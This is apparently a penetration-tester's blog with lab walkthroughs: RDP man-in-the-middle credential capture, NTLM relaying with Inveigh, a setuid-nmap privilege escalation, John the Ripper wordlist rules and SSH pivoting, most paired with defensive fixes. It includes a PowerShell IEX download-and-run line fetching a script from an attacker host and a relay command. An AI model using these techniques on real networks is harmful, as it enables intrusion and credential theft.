Self Signed Certificates + Remote Desktop Protocol = MiTM and Creds – This is a problem, don’t ignore it!

In this post I am going to highlight the risks of using self signed certificates with Remote Desktop Protocol (RDP). Why its a problem and what we can do to fix it! Hopeful by demonstrating the impact it will raise awareness of how serious an issue this can actually be.

On an internal network the issue stems from you connect to a computer or server that is using a self signed certificate through remote desktop your not  able to verify the endpoint for its authenticity. ie it is who it says it is.

Unfortunately we are all too familiar with the classic rdp certificate warning prompt like this and most of the time blindly click on yes I accept. Often with out actually reading what the message is saying.

Ok, lets see what all the fuss is about then. Lets consider the following devices in our LAB

DC16: 192.168.1.10 – Windows Server 2016 Domain Controller

WEB16: 191.168.1.52 – Windows Server 2016 Web Server

W10 192.168.1.51 – Windows 10 Client

Kali  192.168.1.50 – Kali Linux our attacker.

The attacker can essentially sit on the same network and cause a Man In The Middle (MiTM) condition between the windows 10 client and Web Server when using self-signed certificate. If we expand on the scenario slightly. Imagine we have an admin logged in to our windows 10 client, he/she wants to investigate an issue on the web server, so goes to establish a remote desktop session to the server. Lets consider what can happen.

To demonstrate this attack we are going to use ‘Seth’ a tool to perform a MitM attack and extract clear text credentials from RDP connections. Code is located here: https://github.com/SySS-Research/Seth , you can find a more detailed talk about the tool here by its creator Adrian Vollmer https://www.youtube.com/watch?v=wdPkY7gykf4.

On our attacking machine we are going to start Seth:

Mean while our admin is going about his daily tasks on our windows 10 client, he/she then decides to connect to our web server via RDP:

The usual connection sequence takes place, the admin receives the usual all too familiar warning box and continues to establish the connection. In the meanwhile over on our attacking box the connection has been intercepted and the MiTM attack carried out successfully. Seth intercepts the connection and has captured the NTLMv2 hash as well as the clear text credentials. Oh dear.

As you can see this not an optimal configuration, and one which  we would very much like to avoid. It can be avoided by using a signed certificate from your internal CA or other trusted certificate authority. Getting certificates installed on your devices isn’t all that too difficult to go through, I actually discuss this further here and linked to how to. In addition to this we can also stop our clients from connecting to anything we don’t trust via GPO. Remember we need to be connecting to our servers via name not IP. As the IP address is not what is on the certificate in the common name field and will therefore be untrusted.

Well I hope this has helped demonstrate the impact of self-signed certificates and why they should be addressed on the inside.

Facebooktwittergoogle_pluspinterestlinkedinmail

Problems with VirtualBox Guest Additions in Kali – Quick Tip!

Problems with VirtualBox Guest Additions in Kali. This post serves more of a reminder to myself however this might also serve as help to others. Troubleshooting problems/issues with VirtualBox Guest Additions. I think its safe to say I use VirtualBox a lot, I will be lucky if a day goes by where I’m not in VirtualBox using a VM. I also therefore use and rely on Guest Additions working correctly features such as, mapped drives back to the host, USB, display options are all useful to name a few. It can be frustrating sometimes when Guest Additions breaks, either a mapped network drive disappears or your display has shrunk. Once all the usual checks have been done to troubleshoot I normally move on to VirtualBox Guest Additions. I also use Kali, where its also fair to say I have the most issues, now this might be because I probably use it the most in terms of a VirtualBox VM or that Kali 2.0 is rolling and thus based on Debian Testing. As such we have a multitude of updates happening constantly both to packages and underlying operating system. The following is my usual check list and 99% of the time sorts out the issue for Kali 2:

  1. Update VirtualBox to the latest version.
  2. Then update VirtualBox Guest Additions to also the latest edition.
  3. Update Kali; apt-get update & apt-get upgrade -y
  4. Update kali; apt-get dist-upgrade -y
  5. Update the Kernel headers: apt-get update && apt-get install -y linux-headers-$(uname -r)
  6. Re-install VirtualBox Guest Additions directly from VirtualBox:

cp -r /media/cdrom0/ /tmp/
cd /tmp/cdrom0

Make the VBoxLinuxAdditions.run file executable:

chmod u+x VBoxLinuxAdditions.run

Install it:
./VBoxLinuxAdditions.run

If successfully your output should be similar to this:

VirtualBox Guest Additions Installtion Kali

If you get errors in the installation you will need to work back through the errors ensuring the above steps have been executed and are successful.

Well I hope this helps someone out in a jam.

Facebooktwittergoogle_pluspinterestlinkedinmail

NTLM/NTLMv2 Relaying in Windows with PowerShell and Inveigh!

In this post we will be looking at NTLM/NTLMv2 Relaying in Windows with PowerShell and Inveigh! Whats this all about then, and why should I be bothered by it? For a penetration tester Responder by Laurent Gaffie http://www.spiderlabs.com is a great tool for responding to LLMNR (Link Layer Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) queries from workstations and servers on the same subnet. Ultimately being able to capture NTLM/NTLMv2 user names and password hashes on the wire, also being able to relay these credentials onto another host for authentication. I’ve talked about this before here so won’t go into the specifics in this post. This tool is not meant to work on Windows, and is specifically designed to work in Linux, Kali. Inveigh is a windows based version of this written for PowerShell  by Kevin Robertson and can be found here https://github.com/Kevin-Robertson/Inveigh. This is particular useful in many situations. It allows you to test this vulnerability in windows from an attack machine, however more importantly if you compromise a Windows workstation you may be able to download the PowerShell script to the target machine, worse load it straight into memory with an IEX call and carry out the attack from this machine. Further to this imagine the scenario where by the target machine is a pivot point into another network i.e. dual homed.

Lets dig into the action and see it working. In this lab we have a Domain Controller, two Windows machines and WebServer. The Webserver is dual homed with 1 nic into the corp network on 10.0.2.0/24 and the other into the DMZ on 10.0.10.0/24, all other machines reside in the corp network. We will imagine the Webserver  has been compromised through some exploit and we have rdp access at admin level out through the DMZ. We will stage the Inveigh code into memory on the compromised host and attempt to poison LLMNR and NBT-NS requests on the leg into the corporate network. This is a run down of the machines:

Webserver (compromised) nic 2 10.0.2.28 nic 1 10.0.10.28 (non-domain joined)
W7-1 nic 10.0.2.110 (Test.com\W10)
W10-2 nic 10.0.2.111 (Test.com\W10-2)
DC nic 10.0.2.100 (Test.com\DC1)

On the Webserver we will start off by downloading Inveigh in PowerShell and loading it into memory with:

IEX (New-Object Net.WebClient).DownloadString(“http://10.0.10.29:8080/Scripts/Inveigh.ps1”)

For the sake of the Lab we will assume our attacking box 10.0.10.29 is out on the internet.

Now we will invoke the function Inveigh, we will use some added options, note we are specifying the corporate network adapter with the parameter -IP. This will allow us to poison requests for the corporate network:

Invoke-Inveigh -IP 10.0.2.28 -ConsoleOutput Y -NBNS Y

 Mean while our W10-2 machine makes a request to the DC for the resource \\fileserver1.
This resource doesn’t exist in our network and so the windows 10 machine makes a multicast name request across the network, first with NBT-NS then through LLMNR, we can more clearly see this taking place in Wireshark.
At this point our Webserver running Inveigh responds to the request:
 The SMB challenge response takes place:
And bingo! W10-2 sends its NTLMv2 creds over the wire to the Webserver where they are captured:
We can then take this user name and hash and run it through John the Ripper or Hashcat for further use.
You can stop Inveigh by pressing any key then issuing ‘Stop-Inveigh’.
There are other command line parameters that can be passed with the Inveigh script, switching options on and off for example ‘ConsoleOutput -Y’ will output any captured user names and hashes to stdout.
There is also the option to relay the NTLM/NTLMv2 hashes through to another Windows system. This can be done by additionally loading ‘InveighRelay.ps1’ into powershell then first ‘Invoke-Inveigh’ and then ‘Invoke-InveighRelay. The second Invoke-InveighRelay command might look something like this:
Invoke-InveighRelay -ConsoleOutput Y -Target 10.0.2.110 -Command “…..”
The ‘-Command’ parameter can take an array of commands including a launcher from PowerShell Empire as well as other PowerShell commands.
How do we fix this? And stop it from happening?

Firstly enable SMB signing, this does give a slight performance hit however in my opinion worth the sacrafice. Secondly disable LLMNR and NBT-NS, these are old methods for name resolution. You may have legacy applications in your environment that may potentially still use LLMNR and NBT-NS for broadcast name resolution. Due to this thorough testing should be carried out first. If this is the case get onto the vendor for some answers as to why! Otherwise we can disable both LLMNR and NBT-NS via GPO. We can also enable SMB Signing via GPO.  For LLMNR and SMB Signing there are native GPO setting. For NBT-NS there is no native GPO setting however it can be set in the registry. The registry key references an interface name which has its own unique GUID so can’t be changed in GPO via a registry key change (as the key will be different every time), however we can use powershell and do a ‘catch all’ on that key and thus script and then run via GPO. I’ll demonstrate below.

You can disable LLMNR via Group Policy in your domain or locally, go to:

Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client

In the DNS Client settings select “Turn Off Multicast Name Resolution” and set it to ‘Enable’ like below:

Disabling LLMNR

Disabling NBT-NS can be done in the windows networking as shown below:

On the ‘Advanced TCP/IP Settings’ screen select ‘Disable’ radio button for ‘NetBIOS over TCP/IP’.

Disabling NBT-NS

Changing the above will make the following change in the registry, value data 2 is for disable, 0 is the default setting:

NBT-NS disable via registry

Which in turn can be changed via powershell with the following line, this will change all interfaces (notice the tcpip* for the catch all):

The below script can be set to run at startup via GPO:

If we disable NBT-NS first and re-try the whole scenario by requesting a resource of ‘\\fileserver2’ we can see in wireshark that no NBT-NS requests are sent, only LLMNR.

If we disable LLMNR via GPO and re-try requesting \\fileserver3 we now see no LLMNR or NBT-NS requests. Great!

 I hope this has been helpful for someone!
Facebooktwittergoogle_pluspinterestlinkedinmail

Linux Privilege Escalation with Setuid and Nmap

I recently completed a CTF ‘boot to root’ style virtual machine from vulnhub.com and encountered an interesting privilege escalation technique that I thought I would share. Vulnhub is a lot of fun check it out for practice, I’ve recently had a lot of fun with online and offline virtual machine CTF’s and continue to learn a lot. To cut a long story short, I ended up landing a limited user shell on a Linux web server through a php script back to meterpreter. I dropped into a shell from meterpreter, the user had limited access. I was essentially logged in as the web server deamon user id. I started off going through the usual Linux enumeration, gathering some basic information, getting my bearings. A few tasks later on, I started to look at how I could escalate my privileges. I started  looking at files in the file system that could be executed as root. I was specifically looking for executable files where the setuid parameter was marked and where the owner was root. This essentially means when the program is executed it is executed in the permission of the owner of the file (where the EUID, the Effective User ID is root), in this case root. We would look for these types of file with the below find command:

Breaking the above command down:

find – the find command 😉
/ – this is where we are looking in the file system, ie in the root.
-user root – looking for files with the owner of root.
-perm -4000 – looking for where the permissions of file are set to 4000
– exec ls -la – executing the commands ls -la. So we can see additional info.

In the list of files returned I came across the below:

I was able to abuse the above by executing nmap in the context of root. Nmap is set this way as it needs to run in the context of root to be able to perform its many functions. This version of Nmap has an interactive mode, where we are able to execute commands (you can already guess where this is going!). This can be called with ‘nmap –interactive’ which then gives us a special prompt ‘nmap>’. With this prompt we can then execute commands with an ! in front. Even drop into a shell with an EUID as root.

As we can see from the id output the ‘UID’ ie the ‘user id’ is ‘robot’ however the ‘EUID’ ie the ‘effective user id’ is root. Yay!

Well hopes this small snippet of info helps. Happy New Year to all!

Facebooktwittergoogle_pluspinterestlinkedinmail

Creating and mangling custom word lists!

Creating custom word lists:

In this post we are going through how to generate custom word lists with extra combinations based on an initial set of predefined words or generated words using John The Ripper. Why would we want to do this. Well you probably already have giant word lists that you can download from the internet such as the famous ‘rockyou’ list. Or passwords lists from breaches etc. What these huge lists don’t have are tailored words to suit your target specifically. For example we could use a tool called Cewl to spider a website and scrape all words on this site with a minumim length of 6 and a max of 10.  We could also add words manually that relate to that target specifically. We then have a very custom set of words to do with that target, in which to generating new words for. (Obviously for a penetration test of which you have authoirsation to test). We could then use another program such as John The Ripper (JTR) to generate iterations of those words, for example adding the year to the end of the word. (this is a classic)

In this example we will use the list ‘list1.txt’ as our starting point. We will then use commands to output a new file called ‘newlist1.txt’. We will use JTR in Kali to do this. JTR has a set of predefined rules that will generate us new words based on the original words in any given list. We will add custom rule sets in JTR to generate different combinations of the original word(s). This configuration is found in /etc/john/john.conf.

Lets get started with an example.  If we start with the list ‘list1.txt’ and add one word to keep things simple so we can see the words being generated by JTR and our custom rules. Lets start with the below rule which we will append to the bottom of our john.conf file like below:

Append the below text to the bottom of our john.conf file:

#My Custom rules.
[List.Rules:Rule1]
cAz”[0-9]”

like so:

custom rules in john.conf

Now use JTR to generate words using the below command:

john –wordlist=list1.txt –rules=Rule1 –stdout > newlist1.txt

Which looks like:

new words generated by JTR rule1

As you can see this simple rule adds numbers 0-9 to the end of the word and adds it to the new list called newlist1.txt.

Lets try a few more rules how about the below, append the text to the bottom of your john.conf.

[List.Rules:Rule2]
cAz”[0-9]”
cAz”[£!$@#]”
cAz”[0-9][0-9]”
cAz”[£!$@#][0-9]”
cAz”[0-9][0-9][0-9]”
cAz”[0-9][0-9][0-9][0-9]”

custom rules in john.conf 2

Which will in turn generate us the below:

new words generated by JTR rule2

As you can see I have had to tail the newlist.txt file as john has created a huge list, 11176 to be precise.

There are multiple sets of rules available across the internet, for example Korelogic have rules check them out here. See below for some further example rules:

#My Custom rules.
[List.Rules:Rule1]
cAz”[0-9]”
cAz”[£!$@#]”
cAz”[0-9][0-9]”
cAz”[£!$@#][0-9]”
cAz”[0-9][0-9][0-9]”
cAz”[0-9][0-9][0-9][0-9]”

#Replace letters for numbers
[List.Rules:Rule2]
>2!?Aso0
>2!?Asb8
>2!?AsB8
>2!?As1!
>2!?AsA4
>2!?Asa4
>2!?Ase3
>2!?Aso0se3
>2!?Aso0se3si1
>2!?Asi1
>2!?Ass5

Enjoy.

Facebooktwittergoogle_pluspinterestlinkedinmail

Setting up a quick DHCP server in Linux with dnsmasq

This is just a short post to walk through setting up a quick DHCP server in Linux with dnsmasq. In Kali Linux 2.0  to be precisely. You can read more about dnsmasq here. Why might you want to do this? Well, couple of reasons spring to mind whilst on a pentest, setting up application testing, network boot a laptop that’s under review or setting up a wifi/rougue access point are a few that spring to mind.

First install dnsmasq with:

apt-get install dnsmasq

Then edit the dnsmasq config file with your favourite editor:

The config that we might use in a couple of different scenarios would look something similar to the below. You can comment lines out that you don’t want with a ‘#’:

Once you have made your changes restart the dnsmasq service with:

Simple. Hope this quick tip helps.

Facebooktwittergoogle_pluspinterestlinkedinmail

Pivoting through SSH with dynamic port forwarding.

snmp-check UDP over SSH

Pivoting through SSH with dynamic port forwarding. Just a quick post about how we can pivot to an internal/dmz network through a host via SSH. This is a classic example of how we might want to pivot through one host to get to an internal or dmz network using SSH as a tunnel. We can essentially tunnel our traffic of this SSH tunnel via the compromised host to an inside network.

The scenario… A picture paints a thousand words… Essential our ‘Hkali’ machine is on the outside. Our Ubuntu Server is in the internal/dmz, this is going to be our pivot point.

So in this scenario the firewall is only allowing inbound access to our Ubuntu server, on port 22  from our attack box running Kali2.0 ‘HKali’. So from Hkali all we can see is port 22 open on 192.168.100.10. We suspect from our initial enumeration that other servers might be in this network. However, we want to check out the rest of the subnet ie ‘WS2K32’ and ‘meta’ to see whats actually there. Imagine we have compromised the ubuntu server already and have gained login details.

Starting at our attacking machine we will SSH into ‘Ubuntu’. In order to be able to forward traffic for any TCP port on through our SSH tunnel we will want to take advantage of Dynamic port forwarding and specify the ‘-D <port>’ command. This uses ‘Dynamic’ port forwarding feature of SSH. This will allow us to send other tools with Kali to localhost:1234 and thus onward onto any route able networks the ‘Ubuntu’ server can see.

Our command would look similar to the below:

ssh root@192.168.100.10 -D 1234

Before we go any further there are some useful additional options we can pass on the ubuntu server in the SSH command, these being below. However the minimum we need to specify is just the -D for dynamic forwarding:

-f: Sends the process to the background. If you do this you will have to kill the process ID rather than just closing the terminal window as it will already be closed. This is easy enough use ‘ps aux | grep ssh’ to get the process ID then ‘kill <ID number>’.
-C: Compresses the data before sending it through the tunnel, mixed success with this, so experiment.
-q: Uses quiet mode.
-N: Tells SSH that no command will be sent through once the tunnel is up.

If we take a look at our local network connections we can in fact see our ssh connections and also our localhost listening on port 1234.

netstat -antp ssh dynamic ports

We can now use a socks proxy or equivalent to proxify our traffic through the SSH tunnel and onward to the inside network. For this we will use proxychains. Lets look at how we could do this using a socks4 proxy. First a look at our proxychains configuration. Lets open up /etc/proxychains.conf and ensure the the following line is set in the last line. (note the port should be whatever you used in the SSH command after the ‘-D’.

dynamic port forwarding SSH proxychains

Now we can proxify something like nmap through to the internal network. Bear in mind we can only proxify full TCP connect commands. So UDP traffic/tools such as snmp-check won’t work – however, we can proxify udp in an alternative way, I describe this here. Some tools won’t play nice with proxychains, so play around in your lab and experiment.

Enjoy!

 

Facebooktwittergoogle_pluspinterestlinkedinmail

Adding your own or custom exploits to Metasploit! Eternalblue, SambaCry?

Adding your own or custom exploits to Metasploit is easy. If your creating your own exploits for Metasploit  in ruby or want to import custom exploits that you have come across that are not in the main repository then you can follow these simple steps. Why might you want to do this? Well there are certain scenarios such as if you are creating your own exploits or scan scripts. Or you want to test out the bleeding edge exploits without moving to the development edition of Metasploit. For example the ms17-010 exploit or the SambaCry for Linux are currently available to add to Metasploit however are not in the main repo’s yet (at time of writing this). This will allow you to import the ruby scripts, add them to Metasploit an run them in your own labs.

Within Kali2.0 you will have a hidden folder in your root home directory called msf4/modules. Move into this folder and then simply create the following directories .msf4/modules/exploits/windows. Also a folder for Linux respectively .msf4/modules/exploits/linux.

You can then add your ruby scripts to these folders.

Adding custom exploit scripts to Metasploit

Then fire up Metasploit and run ‘reload_all’.

relaod_all Metasploit custom exploits

You should now be able to search or call your new scripts. Remember if your database cache isn’t built follow these steps here.

Add custom exploit scripts to Metasploit ms17_010

Hope this little tip helps.

Facebooktwittergoogle_pluspinterestlinkedinmail

Tunnel snmp-check and other UDP traffic over SSH

Today I will be walking you through how to tunnel snmp-check and other UDP traffic over SSH.

In this example we are tunnelling UDP over SSH to circumvent firewall rules on the outside. Our firewall rules are only allowing access into the other side of the firewall to TCP port 22 on a Ubuntu server. We don’t have access to any other TCP or UDP ports. The only method of communication into the environment is via SSH to our Ubuntu server. We will use this server as jump/pivot point for other traffic. Imagine we have earlier identified through cdpsnarf using SSH dynamic port forwarding and proxychains another router, we want to enumerate this further. Our next goal in this case is to try and enumerate SNMP UDP port 161 on target router with a public community string. This example could also be applied to all sorts of UDP traffic such as DNS for example were we want to tunnel our local DNS requests to a server behind a firewall. Zone transfer maybe?tunnel snmp-check and other UDP over SSH

Attack machine: Kali Linux 192.168.200.2
Pivot Server: Ubuntu 192.168.100.10
Target: GNS3 Cisco Router 192.168.100.100

We are going to do this by sending our local UDP traffic through netcat (handling UDP) into a fifo process back into netcat (handling TCP), through the ssh tunnel then in reverse the other end. Yes I know bit of a brain teaser! You can read more about fifo files here, they are similar to pipe in linux. In essence we are sort of writing the output to a file (without actually writing anything) then sending it on its merry way through netcat via TCP then down the tunnel. Its best we see this in the flesh with an example.

We begin on the Attack machine by running up the ssh connection, here we are forwarding TCP port 6666 on localhost to TCP 6666 on the remote pivot server:

Then on the Pivot Server we create a fifo file for netcat to talk too:

On the Attack machine we do similar:

In second terminal on the attack machine:

Run up ‘netstat -au’ to verify snmp is listening on the local machine.

UDP netstat connections

We can then simple run snmp-check to localhost.

snmp-check over SSH

 

Looking further down the information we discover the following:
snmp-check over SSH another netowrk

 

Another network interface, is this possibly the internal network and route to DA..? Maybe in the next post…

Bingo UDP and snmp-check over an SSH tunnel, awesome!

Facebooktwittergoogle_pluspinterestlinkedinmail

Quick tip! Changing your MAC address in Windows, Linux and OSX is simple.

Changing your MAC address in Windows, Linux and OSX is simple. In this post I show you how:

For Windows:

In windows we can use PowerShell, to lookup the adapter name:

Then using the name of the interface we want to change specify:

For Linux:

In Kali Linux we can simple run macchanger specifying the -r for random and the interface name as below:

For OSX:

Open a terminal and type:

Ace!

Facebooktwittergoogle_pluspinterestlinkedinmail